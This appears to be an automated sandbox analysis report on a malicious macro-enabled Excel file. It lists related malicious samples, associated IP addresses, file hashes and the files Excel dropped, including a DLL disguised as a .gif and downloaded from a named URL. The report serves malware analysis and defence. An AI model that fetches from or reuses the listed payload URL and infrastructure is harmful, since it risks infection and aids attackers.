                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19mail_6512365134_7863_202104108.htmlGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  Copia bancaria de swift.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.36659493.29456.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  SecuriteInfo.com.Trojan.Siggen12.64197.30705.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  #Ud83d#Udcde973.htmGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  3vQD6TIYA1.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  SOLICITUD DE PRESUPUESTO 08-04-2021#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  XN123gfQJQ.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  documento.xlsbGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  securedmessage.htmGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  Smart wireless request.xlsbGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  SecuriteInfo.com.Trojan.PWS.Siggen2.64388.32153.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  BB44.vbsGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  BrgW593cHH.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  BrgW593cHH.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  FAKTURA I RACHUNKI.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  WDnE51mua6.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  ikoAImKWvI.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173
                                                                                                                                                                  V7UnYc7CCN.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 162.251.80.27
                                                                                                                                                                  • 67.222.38.97
                                                                                                                                                                  • 173.201.252.173

                                                                                                                                                                  Dropped Files

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifdocuments-1819557117.xlsmGet hashmaliciousBrowse
                                                                                                                                                                    C:\Users\user\ghnrope2.dlldocuments-1819557117.xlsmGet hashmaliciousBrowse

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7F71DD77-C2D9-4F65-ACF1-025D1C4A7561
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):133170
                                                                                                                                                                      Entropy (8bit):5.371006409223425
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:6cQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:yVQ9DQW+zTXiJ
                                                                                                                                                                      MD5:47284F10FD58C215804AD06146C2DB1F
                                                                                                                                                                      SHA1:C9D048223A73AA698012103F5FACEFB8C91C9E91
                                                                                                                                                                      SHA-256:242CFF97D9B3EC4DDF04A28111084066A8A4EA95D2239939876050CD1B91D999
                                                                                                                                                                      SHA-512:E56180699854F029FDEC00F55376E643064D5D4E28E404B29D935EEEF86467238F9B23C71AE134B6F426CC1A9D391CE7A8AD638F14EE3E1472DDCEED0B8523BC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-09T14:32:46">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C31A19FB.png
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                      Entropy (8bit):7.595467031611744
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                                      MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                                      SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                                      SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                                      SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CD3F03A5.png
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8301
                                                                                                                                                                      Entropy (8bit):7.970711494690041
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                                      MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                                      SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                                      SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                                      SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D83053C0.png
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8854
                                                                                                                                                                      Entropy (8bit):7.949751503848125
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj
                                                                                                                                                                      MD5:780FD0ABF9055E2D8FA1BAB6D4B9163E
                                                                                                                                                                      SHA1:CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE
                                                                                                                                                                      SHA-256:6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
                                                                                                                                                                      SHA-512:8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: .PNG........IHDR...l.........E..7....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<.."#IDATx..]M.$.u.Y...V.Z!$......C.H2>.....JBR....c.2..k....'.f......qg..7O.W..0.'.bO6x...l..#!W...`h.~......Y...*+..._.x.".....#.....[........C.ISj..i..i.peOD..BT.N....IoD..qS..M{.I.D...!...[."A....GM........I.M......'T#D....&Q.H.."...Cqn"l....&.G.Mo....MI......u&.~.#k............R...<Q7%o~}.$d..L..j.<l..<...N.K.M"l.aU...G,N...v....LE..Y@.l....;n.?.Z%.&.V.....,.d".K^bM..B. ....B.l"l.a.....<...q...."K.....{.,...j.&...F.@xU......i.q..R.`u#<...........mR...j+ ..^.x...1TR..qw"l....&.a.W...}v.......S.zT..a...J.0....5... E..i"l.a%..<............lSM.a...N.........hI....."D...R.u....."Q.K.#.gM)}.L...*..b..D.y9{.kR7aA....:_..LL#......M...).{.l..O..lv...lP0l+....Y.Y.5.....j@$.C.h!qy/.D..%...g.c...D.......X..M$O.v%Z..S.%w..1"l....B'.O.I..B..}.............iL...X..3..`[.g...j..J.'...Y...rr..@m....@.uC.#......e!.4...M.a.y.......&h.o...Y.Q...@....N]6..."H.
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E2C3ED62.png
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):557
                                                                                                                                                                      Entropy (8bit):7.343009301479381
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                                      MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                                      SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                                      SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                                      SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gif
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):185404
                                                                                                                                                                      Entropy (8bit):6.206741223040736
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo
                                                                                                                                                                      MD5:7D7BDC559AE699579A700645D0FD5F03
                                                                                                                                                                      SHA1:C4C0CA6B2B7779D870B0B69E5D7001453BABBFF0
                                                                                                                                                                      SHA-256:0A0B3D91698A46D409791D4DD866E56DDD70F91A3F1D4557A0CB2899BDA1E524
                                                                                                                                                                      SHA-512:3A815F4CEE13B0D491E6C527D30DB0FB9E77FB489F606539E8026A3C2797A3A52672378B9B0788C5DFD5953ECB11D1BA5F2AE30F493CDBBB42A49E42E4278016
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                      • Filename: documents-1819557117.xlsm, Detection: malicious, Browse
                                                                                                                                                                      IE Cache URL:https://shalombaptistchapel.com/ds/0604.gif
                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................Rich..........PE..d..._.p`.........." ......................................................................`.....................................................<...................................0...................................................0............................text............................... ..`.rdata..@...........................@..@.data...............................@....pdata...............~..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\F5A10000
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):97555
                                                                                                                                                                      Entropy (8bit):7.878354858676539
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfn5mw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mf
                                                                                                                                                                      MD5:E4735BE32837B3EFD70C66BB5547CA81
                                                                                                                                                                      SHA1:90748B338652039E32B449C0E35FA43A90A5D0C7
                                                                                                                                                                      SHA-256:5338F8519CE6018CD4EB19F7E2144BEAC3DDF7CE8D440596BEF9B540A1AF26AE
                                                                                                                                                                      SHA-512:ACEBCDC169CF8040B8E6C6184191DFC076F33A90CD29942667D1C7B69F413E26FA51B9AAF033968BD3EEC2BFA79C0777AE7B3A3EF164BDD5538FF73ACB697E33
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .UKO.0..#...|]%..Vh....Y$......_..h.=c7..J.......1.$......"j.Zv.X.Nz.]..wW.9.0.....Z..d...'.e....e}J.7.({........G+....!..~6.......)s.../..I.....L.c..{Y.e"...Hd.?8.N.........D.`. ....&DM...R....u.4.........9............@!.|...G..ZAu#b........}.O..7.Ir..kXH0MI..BF.........nQ*H..t....d{.r%.x...{0B.7{.Y.Q/,..}........N.../...]hv.ii..8.....^DP...G...^s..x...pq|...6]..7...y.....G]F.. &..a.i...i...n....A...k........PK..........!.\lC............[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:34:24 2019, mtime=Fri Apr 9 22:32:48 2021, atime=Fri Apr 9 22:32:48 2021, length=16384, window=hide
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):909
                                                                                                                                                                      Entropy (8bit):4.695304331247972
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:8MpJRUxLv6CHiMGWxeGXADWB+W+jA0/y1bDyZTLkeGLkeM4t2Y+xIBjKZm:8SWkWxP6WqA0KJDyj7aB6m
                                                                                                                                                                      MD5:8F1A3FB730EC3A8F5EC8A158DDE95C94
                                                                                                                                                                      SHA1:F0037E120763C2536758705A1E5235A0848BEF08
                                                                                                                                                                      SHA-256:F04FF42E981BDFFFCB061FF7D090A24F9718CE263FAC27B4938E5C020B579684
                                                                                                                                                                      SHA-512:6CC8C208C4086722A4E664A617A93743E098E4E60A96E90772ACA26BF0C1CD6400076CE6560602E9DCE01199049ABA7A02A9A81429D9AC38E04E44DA467F67A8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: L..................F............-.......-.......-...@......................y....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S........................a.l.f.o.n.s.....~.1......R....Desktop.h.......NM..R.......Y..............>.....?l..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......F...............-.......E...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Aw...`.......X.......305090...........!a..%.H.VZAj...q.I..........W...!a..%.H.VZAj...q.I..........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documents-1819557117.LNK
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:03 2020, mtime=Fri Apr 9 22:32:48 2021, atime=Fri Apr 9 22:32:48 2021, length=97555, window=hide
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2230
                                                                                                                                                                      Entropy (8bit):4.738436789765632
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:82kWxP2WiJK96AKKpK9UDyT7aB6my2kWxP2WiJK96AKKpK9UDyT7aB6m:82kW52WiEKKpB6p2kW52WiEKKpB6
                                                                                                                                                                      MD5:7C8FCA6F65C18FA8210897F28E263325
                                                                                                                                                                      SHA1:FC9C467A52B14EB7BAB72604F8BC485ADB129D6C
                                                                                                                                                                      SHA-256:A974DE374090319C6A50CD5E4B2F3EE3C11D311DC43DED69A0A3479671B7A11C
                                                                                                                                                                      SHA-512:130F0D52D75CE5DB0F67EB64C020EF5F649F6B557F1108D9E0DD362DFB44DB3ED4903C2EC6AECC5F0C38479A34DB5072F61C824AA5793D5506102C6CB804DBB4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: L..................F.... .....8.8...N..-.....-...}...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S........................a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R.......Y..............>.......m.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .DOCUME~1.XLS..d......>Q.u.R......f.........................d.o.c.u.m.e.n.t.s.-.1.8.1.9.5.5.7.1.1.7...x.l.s.m.......`...............-......._...........>.S......C:\Users\user\Desktop\documents-1819557117.xlsm..0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.s.-.1.8.1.9.5.5.7.1.1.7...x.l.s.m.........:..,.LB.)...Aw...`.......X.......305090...........!a..%.H.VZAj....Yt.+........W...!a..%.H.VZAj....Yt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):115
                                                                                                                                                                      Entropy (8bit):4.66882021623009
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:oyBVomxWKS9LRng9CZELRng9CmxWKS9LRng9Cv:dj49LJQgELJQC9LJQs
                                                                                                                                                                      MD5:359F4F243B208E2F7BEC4696161C1C56
                                                                                                                                                                      SHA1:2EC141564445F34EA03BB20E2F8237AEB9D50C00
                                                                                                                                                                      SHA-256:7FEFA1E5026005C1DBE4548936836F0817E4EEEC59595287FBA1CE9208CE2632
                                                                                                                                                                      SHA-512:4B54C65A070E885723625AE74B2C8A69FE84783FFE9F33748BDF284DE7D0547462C951228CEFBB1DE35B21BF06C982FCE1120C486DA6ABBA1F98F8B8150E70F8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: Desktop.LNK=0..[misc]..documents-1819557117.LNK=0..documents-1819557117.LNK=0..[misc]..documents-1819557117.LNK=0..
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):22
                                                                                                                                                                      Entropy (8bit):2.9808259362290785
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                      MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                      SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                      SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                      SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                      C:\Users\user\Desktop\C6A10000
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):97555
                                                                                                                                                                      Entropy (8bit):7.878354858676539
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfn5mw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mf
                                                                                                                                                                      MD5:E4735BE32837B3EFD70C66BB5547CA81
                                                                                                                                                                      SHA1:90748B338652039E32B449C0E35FA43A90A5D0C7
                                                                                                                                                                      SHA-256:5338F8519CE6018CD4EB19F7E2144BEAC3DDF7CE8D440596BEF9B540A1AF26AE
                                                                                                                                                                      SHA-512:ACEBCDC169CF8040B8E6C6184191DFC076F33A90CD29942667D1C7B69F413E26FA51B9AAF033968BD3EEC2BFA79C0777AE7B3A3EF164BDD5538FF73ACB697E33
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .UKO.0..#...|]%..Vh....Y$......_..h.=c7..J.......1.$......"j.Zv.X.Nz.]..wW.9.0.....Z..d...'.e....e}J.7.({........G+....!..~6.......)s.../..I.....L.c..{Y.e"...Hd.?8.N.........D.`. ....&DM...R....u.4.........9............@!.|...G..ZAu#b........}.O..7.Ir..kXH0MI..BF.........nQ*H..t....d{.r%.x...{0B.7{.Y.Q/,..}........N.../...]hv.ii..8.....^DP...G...^s..x...pq|...6]..7...y.....G]F.. &..a.i...i...n....A...k........PK..........!.\lC............[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      C:\Users\user\Desktop\~$documents-1819557117.xlsm
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                                      MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                                      SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                                      SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                                      SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                      C:\Users\user\ghnrope2.dll
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
